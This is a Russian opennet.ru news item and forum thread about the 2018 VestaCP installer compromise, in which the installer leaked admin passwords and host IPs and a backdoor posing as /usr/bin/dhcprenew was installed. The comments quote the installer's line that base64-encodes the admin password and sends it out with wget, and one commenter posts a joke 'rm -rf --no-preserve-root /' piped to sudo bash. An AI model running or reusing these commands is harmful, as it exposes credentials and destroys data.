URL: https://www.opennet.ru/cgi-bin/openforum/vsluhboard.cgi
Форум: vsluhforumID3
Нить номер: 115606
[ Назад ]
Исходное сообщение
"Злоумышленники добавили вредоносный код в скрипт установки х..."
Отправлено opennews , 18-Окт-18 13:47
В установочном скрипте панели управления хостингом VestaCP выявлен (https://forum.vestacp.com/viewtopic.php?f=10&t=17641&start=1...) код, выполняющий отправку параметров аутентификации для доступа к системе пользователя. В частности, в штатную систему отправки телеметрии, которая в ответ на внешний запрос осуществляет вывод названия дистрибутива, добавлены дополнительные параметры, выдающие пароль администратора и IP текущего хоста.Индикатором утечки данных является наличие в логе запросов вида "http://vestacp.com/test/?ip=x.x.x.x". Если данная активность наблюдается, то вероятно уже недостаточно просто сменить пароль администратора. После получения параметров доступа, атакующие устанавливали бэкдор, который мог выглядеть как системный файл
/usr/bin/dhcprenew, реализующий командный сервер для участия в совершении DoS-атак и предоставляющий скрытый shell. После запуска указанный бэкдор маскируется под видом процесса "[kworker/1:1]".
В ходе начального разбора инцидента выяснилось, что код удалось изменить в результате взлома некоторых серверов инфраструктуры проекта. Взлом произведён при помощи новой уязвимости, вызванной ошибкой в API, появившейся в апрельском выпуске 0.9.8-20 (https://forum.vestacp.com/viewtopic.php?f=25&p=68895#p68895). Проблемы устранены (https://forum.vestacp.com/viewtopic.php?f=10&t=17641&start=1...) в выпуске 0.9.8-23 (https://github.com/serghey-rodin/vesta/commit/cde42691701667...). Дополнительные подробности пока не сообщаются.
URL: https://forum.vestacp.com/viewtopic.php?f=10&t=17641&start=1...
Новость: https://www.opennet.ru/opennews/art.shtml?num=49457
Содержание
- Злоумышленники добавили вредоносный код в скрипт установки х...,Аноним, 13:47 , 18-Окт-18
- Злоумышленники добавили вредоносный код в скрипт установки х...,А, 14:51 , 18-Окт-18
- Злоумышленники добавили вредоносный код в скрипт установки х...,Аноним, 16:26 , 18-Окт-18
- Злоумышленники добавили вредоносный код в скрипт установки х...,Аноним, 16:49 , 18-Окт-18
- Злоумышленники добавили вредоносный код в скрипт установки х...,Himik, 18:56 , 18-Окт-18
- Злоумышленники добавили вредоносный код в скрипт установки х...,Аноним, 23:32 , 18-Окт-18
- Злоумышленники добавили вредоносный код в скрипт установки х...,Ирокез, 19:58 , 18-Окт-18
- Злоумышленники добавили вредоносный код в скрипт установки х...,Аноним, 08:26 , 19-Окт-18
- Злоумышленники добавили вредоносный код в скрипт установки х...,mikhailnov, 14:07 , 18-Окт-18
- Злоумышленники добавили вредоносный код в скрипт установки х...,Аноним, 14:29 , 18-Окт-18
- Злоумышленники добавили вредоносный код в скрипт установки х...,Аноним, 16:42 , 19-Окт-18
- Злоумышленники добавили вредоносный код в скрипт установки х...,Аноним, 15:06 , 18-Окт-18
- Злоумышленники добавили вредоносный код в скрипт установки х...,scorry, 15:47 , 18-Окт-18
- Злоумышленники добавили вредоносный код в скрипт установки х...,th3m3, 16:59 , 18-Окт-18
- Злоумышленники добавили вредоносный код в скрипт установки х...,Аноним, 18:13 , 18-Окт-18
- Злоумышленники добавили вредоносный код в скрипт установки х...,CHERTS, 14:37 , 18-Окт-18
- Злоумышленники добавили вредоносный код в скрипт установки х...,Аноним, 14:39 , 18-Окт-18
- Злоумышленники добавили вредоносный код в скрипт установки х...,th3m3, 16:53 , 18-Окт-18
- Злоумышленники добавили вредоносный код в скрипт установки х...,FedeX, 17:09 , 18-Окт-18
- Злоумышленники добавили вредоносный код в скрипт установки х...,Аноним, 19:25 , 18-Окт-18
- Злоумышленники добавили вредоносный код в скрипт установки х...,Аноним, 18:36 , 18-Окт-18
- Злоумышленники добавили вредоносный код в скрипт установки х...,Борщдрайвен бигдата, 20:41 , 18-Окт-18
- Злоумышленники добавили вредоносный код в скрипт установки х...,Типа хомячок, 23:04 , 18-Окт-18
- Злоумышленники добавили вредоносный код в скрипт установки х...,KonstantinB, 06:26 , 19-Окт-18
- Злоумышленники добавили вредоносный код в скрипт установки х...,нах, 10:37 , 19-Окт-18
- Злоумышленники добавили вредоносный код в скрипт установки х...,KonstantinB, 04:03 , 20-Окт-18
- Злоумышленники добавили вредоносный код в скрипт установки х...,пох, 10:46 , 20-Окт-18
- Злоумышленники добавили вредоносный код в скрипт установки х...,Vitaliy Blats, 12:40 , 20-Окт-18
- Злоумышленники добавили вредоносный код в скрипт установки х...,пох, 19:35 , 20-Окт-18
- Злоумышленники добавили вредоносный код в скрипт установки х...,odd.mean, 07:38 , 19-Окт-18
- Злоумышленники добавили вредоносный код в скрипт установки х...,Аноним, 09:41 , 19-Окт-18
- Злоумышленники добавили вредоносный код в скрипт установки х...,Аноним, 06:23 , 21-Окт-18
- Злоумышленники добавили вредоносный код в скрипт установки х...,odd.mean, 08:40 , 21-Окт-18
- Злоумышленники добавили вредоносный код в скрипт установки х...,Аноним, 09:44 , 19-Окт-18
- Злоумышленники добавили вредоносный код в скрипт установки х...,Vitaliy Blats, 12:17 , 19-Окт-18
- Злоумышленники добавили вредоносный код в скрипт установки х...,Аноним, 21:06 , 19-Окт-18
- Злоумышленники добавили вредоносный код в скрипт установки х...,пох, 21:46 , 19-Окт-18
- Злоумышленники добавили вредоносный код в скрипт установки х...,Грусть, 22:59 , 19-Окт-18
- Злоумышленники добавили вредоносный код в скрипт установки х...,пох, 19:39 , 20-Окт-18
- Злоумышленники добавили вредоносный код в скрипт установки х...,Аноним, 23:16 , 19-Окт-18
- Злоумышленники добавили вредоносный код в скрипт установки х...,Аноним, 01:43 , 20-Окт-18
- Злоумышленники добавили вредоносный код в скрипт установки х...,annual slayer, 06:45 , 20-Окт-18
Сообщения в этом обсуждении
"Злоумышленники добавили вредоносный код в скрипт установки х..."
Отправлено Аноним , 18-Окт-18 13:47
> штатную систему отправки телеметрииУх. Хорошо зашли.
"Злоумышленники добавили вредоносный код в скрипт установки х..."
Отправлено А , 18-Окт-18 14:51
> которая в ответ на внешний запрос осуществляет вывод названия дистрибутиваха-а-арошая какая телеметрия. она еще и запросы штатно принимает. вообще класс. штатную телеметрию модернизировали до телеуправления.
"Злоумышленники добавили вредоносный код в скрипт установки х..."
Отправлено Аноним , 18-Окт-18 16:26
А ты как собираешься без запросов спросить телеметрию, умник?
"Злоумышленники добавили вредоносный код в скрипт установки х..."
Отправлено Аноним , 18-Окт-18 16:49
А не надо её спрашивать. Можно сделать, чтобы клиент телеметрии сам отправлял её по расписанию, скажем, раз в неделю. Без запросов с сервера.
"Злоумышленники добавили вредоносный код в скрипт установки х..."
Отправлено Himik , 18-Окт-18 18:56
Злоумышленники добавили вредоносный код в скрипт установки хостинг-панели VestaCP. Хотябы название статьи читали. Если сервер не отвечает на запросы, то это не сервер.
"Злоумышленники добавили вредоносный код в скрипт установки х..."
Отправлено Аноним , 18-Окт-18 23:32
Ага, рабочая станция значит, так?
А если рабочая станция отвечает, то сервер, блин у меня оказывается ЦОД набитый серверами...
"Злоумышленники добавили вредоносный код в скрипт установки х..."
Отправлено Ирокез , 18-Окт-18 19:58
Ш10 отправляет ваши данные в микрософт говорили они.
"Злоумышленники добавили вредоносный код в скрипт установки х..."
Отправлено Аноним , 19-Окт-18 08:26
Дурной пример заразителен. Веб-абизянки тоже хотят быть как большая компания.
"Злоумышленники добавили вредоносный код в скрипт установки х..."
Отправлено mikhailnov , 18-Окт-18 14:07
Повесил на вход в админку Vesta на нестандартном порте дополнительную HTTP-авторизацию средствами nginx. Уже вторая уязвимость мимо.
"Злоумышленники добавили вредоносный код в скрипт установки х..."
Отправлено Аноним , 18-Окт-18 14:29
Если не забывать о том, что введенные вами логин/пароль пробрасываются в весту в заголовке BasicAuth, ни разу не мимо. Их могло запросто отправить вместе с прочей "телеметрией".
"Злоумышленники добавили вредоносный код в скрипт установки х..."
Отправлено Аноним , 19-Окт-18 16:42
> введенные вами логин/пароль пробрасываются в весту в заголовке BasicAuth, ни разу не мимо. Их могло запросто отправить вместе с прочей "телеметрией".Наш ответ: https://hackage.haskell.org/package/sproxy2
"Злоумышленники добавили вредоносный код в скрипт установки х..."
Отправлено Аноним , 18-Окт-18 15:06
Как это спасёт от "бэкдора в установочном скрипте"? Безопасности удалятся 0, информирование через месяц (ветка форума eng раздела, спасибо, что после обновления, скрипт проверки отработает), fail2ban/firewall так и научили определять порты "/usr/local/vesta/bin/v-add-firewall-chain" (не дефолтный фтп). И нет, у меня всё чисто, но уже напрягает.
"Злоумышленники добавили вредоносный код в скрипт установки х..."
Отправлено scorry , 18-Окт-18 15:47
«поставил себе вирус. закрыл файрволлом. я хаккир.»
"Злоумышленники добавили вредоносный код в скрипт установки х..."
Отправлено th3m3 , 18-Окт-18 16:59
На что только не пойдут, лишь бы консолью не пользоваться.
"Злоумышленники добавили вредоносный код в скрипт установки х..."
Отправлено Аноним , 18-Окт-18 18:13
Ваш комментарий огорчает молодых специалистов.
"Злоумышленники добавили вредоносный код в скрипт установки х..."
Отправлено CHERTS , 18-Окт-18 14:37
Ох и рeшето... других слов просто нет.
"Злоумышленники добавили вредоносный код в скрипт установки х..."
Отправлено Аноним , 18-Окт-18 14:39
Давно знал что майкрософты ужасное по делают
"Злоумышленники добавили вредоносный код в скрипт установки х..."
Отправлено th3m3 , 18-Окт-18 16:53
Я давно говорил, что все эти панели - добром не кончатся. И ведь не первая новость про эту Весту. Давно отказался от этих ваших панелей и жить стало лучше и веселее, особенно когда читаю такие новости, про очередной косяк с панелями.
"Злоумышленники добавили вредоносный код в скрипт установки х..."
Отправлено FedeX , 18-Окт-18 17:09
Не зря матери дочерей учат - "Кто не учился, те работают на панели и заразы всякой набираются".
"Злоумышленники добавили вредоносный код в скрипт установки х..."
Отправлено Аноним , 18-Окт-18 19:25
А потому служат Нурглу и Слаанеш сразу?
"Злоумышленники добавили вредоносный код в скрипт установки х..."
Отправлено Аноним , 18-Окт-18 18:36
статья ваша ниочем. сотрудники vesta сами добавили сбор пароля от admin в инсталлятор в base64, потом его удалили.
codename="$codename:$(echo $vpass:$servername | base64)"
wget vestacp.com/notify/?$codename -O /dev/null -qhttps://github.com/serghey-rodin/vesta/commit/a3f0fa1501d424...
https://github.com/serghey-rodin/vesta/commit/ee03eff016e03c...
а взломщики скорее взяли их из лога сервера vestacp - куда они отправлялись инсталлятором
а ссылка http://vestacp.com/test/?ip=127.0.0.1 для проверки ip вашего сервера (есть ли он в логах или нет)
"Злоумышленники добавили вредоносный код в скрипт установки х..."
Отправлено Борщдрайвен бигдата , 18-Окт-18 20:41
> сотрудники vesta сами добавили сбор пароля от admin в инсталлятор в base64, потом его удалилиНо зачем?!
"Злоумышленники добавили вредоносный код в скрипт установки х..."
Отправлено Типа хомячок , 18-Окт-18 23:04
'Cause they can, очевидно же.
"Злоумышленники добавили вредоносный код в скрипт установки х..."
Отправлено KonstantinB , 19-Окт-18 06:26
Шикарно.И это тот случай, когда открытые исходники не помогут: те, кто умеет их читать, не пользуются панелями, и наоборот. :-)
"Злоумышленники добавили вредоносный код в скрипт установки х..."
Отправлено нах , 19-Окт-18 10:37
хинт: те кто умеет их читать, не пользуются панелями, а продают их как услугу. Правда, вряд ли на свете много продающих хостинг на весте - коммерческие хостеры обычно используют cpanel или ispmgr (оба феерическое невменяемое гуанище с закрытым кодом, больными yблюдкaми в менеджменте и рукoжoпыми гoвнoкодерами, но ничего лучшего опенсосеры не родили)
"Злоумышленники добавили вредоносный код в скрипт установки х..."
Отправлено KonstantinB , 20-Окт-18 04:03
Ой, не напоминайте мне об этих убожествах. Слава яйцам, в последние лет 5 это все никому, кроме пожилых сеошников, не надо.
"Злоумышленники добавили вредоносный код в скрипт установки х..."
Отправлено пох , 20-Окт-18 10:46
> Ой, не напоминайте мне об этих убожествах. Слава яйцам, в последние лет
> 5 это все никому, кроме пожилых сеошников, не надо.угу, нет другого интернета кроме вконтактега и мордокнижечки, и товарищ майор пророк ихний.
"Злоумышленники добавили вредоносный код в скрипт установки х..."
Отправлено Vitaliy Blats , 20-Окт-18 12:40
> Ой, не напоминайте мне об этих убожествах. Слава яйцам, в последние лет
> 5 это все никому, кроме пожилых сеошников, не надо.Это ты так думаешь. В мире мало того что куча VPS'ок с предустановленной панелью, так еще и куча сайтов на шаред-хостинге, где так же используются эти панели.
Мы, пожилые сеошники конечно рады, что ты великий гуру можешь купить VPS'ку, задеплоить туда твою Убунтачку, поставить туда LAMP, exim с dovecot'ом, вебмылом и спамассасином, ну и само собой разумеется сгенерить DKIM'ы дабы письмецы не попадали в спам, написать скрипты добавления мыльных аккаунтов и доменов (просто если ты будешь добавлять это вручную - то ты еще фееричнее кретин чем я думал) и все это за 5 баксов - но мы НЕ ТАКИЕ, мы просто хотим сделать сайт-визитку для своей шашлычной на Вордпрессе за полчаса :))
"Злоумышленники добавили вредоносный код в скрипт установки х..."
Отправлено пох , 20-Окт-18 19:35
> мы просто хотим сделать сайт-визитку для своей шашлычной на Вордпрессе за полчаса :))на самом деле нам его уже сделал жопорукий аутсорсер, осталось выложить.
Он, конечно,предлагает хоститься на его сервере, но, поскольку он его сам настраивал, как умел, тот сервер половину времени не работает, и во всех блоклистах отметился, а еще он на нем немножечко майнит.
"Злоумышленники добавили вредоносный код в скрипт установки х..."
Отправлено odd.mean , 19-Окт-18 07:38
Хорошую вещь "CP" не назовут.
"Злоумышленники добавили вредоносный код в скрипт установки х..."
Отправлено Аноним , 19-Окт-18 09:41
И альта-вистой тоже....
"Злоумышленники добавили вредоносный код в скрипт установки х..."
Отправлено Аноним , 21-Окт-18 06:23
а CP/M ?
"Злоумышленники добавили вредоносный код в скрипт установки х..."
Отправлено odd.mean , 21-Окт-18 08:40
Ну разве что CP/M. Да и то...
"Злоумышленники добавили вредоносный код в скрипт установки х..."
Отправлено Аноним , 19-Окт-18 09:44
Есть Ajenti не вижу смысла в существовании этого плохо-кода.
"Злоумышленники добавили вредоносный код в скрипт установки х..."
Отправлено Vitaliy Blats , 19-Окт-18 12:17
> Есть Ajenti не вижу смысла в существовании этого плохо-кода.Есть %software_name1% не вижу смысла в существовании этого %software_name2%.
"Злоумышленники добавили вредоносный код в скрипт установки х..."
Отправлено Аноним , 19-Окт-18 21:06
Fuck mehttps://github.com/serghey-rodin/vesta:
```
Download the installation script:
curl -O http://vestacp.com/pub/vst-install.sh
Then run it:
bash vst-install.sh
```
"Злоумышленники добавили вредоносный код в скрипт установки х..."
Отправлено пох , 19-Окт-18 21:46
прости, а то что он тебе понаустановит - ты запускать вообще не планируешь? Или предполагаешь, что баш чем-то страшнее и ужаснее php?
"Злоумышленники добавили вредоносный код в скрипт установки х..."
Отправлено Грусть , 19-Окт-18 22:59
Вам следует настроить свой камертон на curl http://...
"Злоумышленники добавили вредоносный код в скрипт установки х..."
Отправлено пох , 20-Окт-18 19:39
ой, какой ужас, злые соседи...э...какие нахрен соседи, мы что дома ставимся? Злые враги инженеры хостера...э...стоп, а им зачем, они прямо на диск могут записать... э... ну я уж прям не знаю кто - магистральные операторы в терабитах порнухи и котиков разглядели наш невинный curl и подбросили вражеский код, да?
"Злоумышленники добавили вредоносный код в скрипт установки х..."
Отправлено Аноним , 19-Окт-18 23:16
echo "rm -rf --no-preserve-root /" | sudo bash
"Злоумышленники добавили вредоносный код в скрипт установки х..."
Отправлено Аноним , 20-Окт-18 01:43
curl2bash™
"Злоумышленники добавили вредоносный код в скрипт установки х..."
Отправлено annual slayer , 20-Окт-18 06:45
есть уже `curl --rootme`